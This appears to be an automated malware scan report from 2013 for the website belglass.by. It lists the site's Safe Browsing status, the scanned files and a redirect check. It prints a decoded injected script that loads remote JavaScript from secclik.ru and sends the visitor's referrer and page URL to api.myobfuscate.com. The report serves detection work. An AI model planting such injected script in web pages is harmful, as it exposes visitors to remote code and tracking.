Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=belglass.by
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://belglass.by/ | 200 OK Content-Length: 33007 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: secclik.ru
Decoded script: var _escape='%3Cscript%20type%3D%22text/javascript%22%20%20src%3D%22http%3A//secclik.ru/handler.php%3Fid%3D7016%22%3E%3C/script%3E';var OII = document.createElement('script'); OII.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var I0O = document.getElementsByTagName('head')[0]; I0O.appendChild(OII);document.write(unescape(_escape)); var _escape='%3Cscript%20type%3D%22text/javascript%22%20%20src%3D%22http%3A//secclik.r ...[360 bytes skipped]...
http://belglass.by/templates/belglass/css/scripts.js | 200 OK Content-Length: 56 Content-Type: application/x-javascript | clean |
http://secclik.ru/handler.php?id=7016 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://secclik.ru/test404page.js | 404 Not Found Content-Length: 570 Content-Type: text/html | clean |
http://belglass.by/engine/ajax/menu.js | 200 OK Content-Length: 3368 Content-Type: application/x-javascript | clean |
http://belglass.by/engine/ajax/dle_ajax.js | 200 OK Content-Length: 4725 Content-Type: application/x-javascript | clean |
http://belglass.by/engine/ajax/js_edit.js | 200 OK Content-Length: 6627 Content-Type: application/x-javascript | clean |
http://tools.spylog.ru/counter_cv.js | 200 OK Content-Length: 5066 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: belglass.by
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 16 Dec 2013 11:52:28 GMT
Pragma: no-cache
Server: nginx/1.4.4
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 16 Dec 2013 04:52:28 GMT
Set-Cookie: PHPSESSID=e273eeea9acdc7533c7243ae13065618; path=/
X-Powered-By: PHP/4.4.9
Second query (visit from search engine):
GET / HTTP/1.1
Host: belglass.by
Referer: http://www.google.com/search?q=belglass.by
Result:
The result is similar to the first query. There are no suspicious redirects found.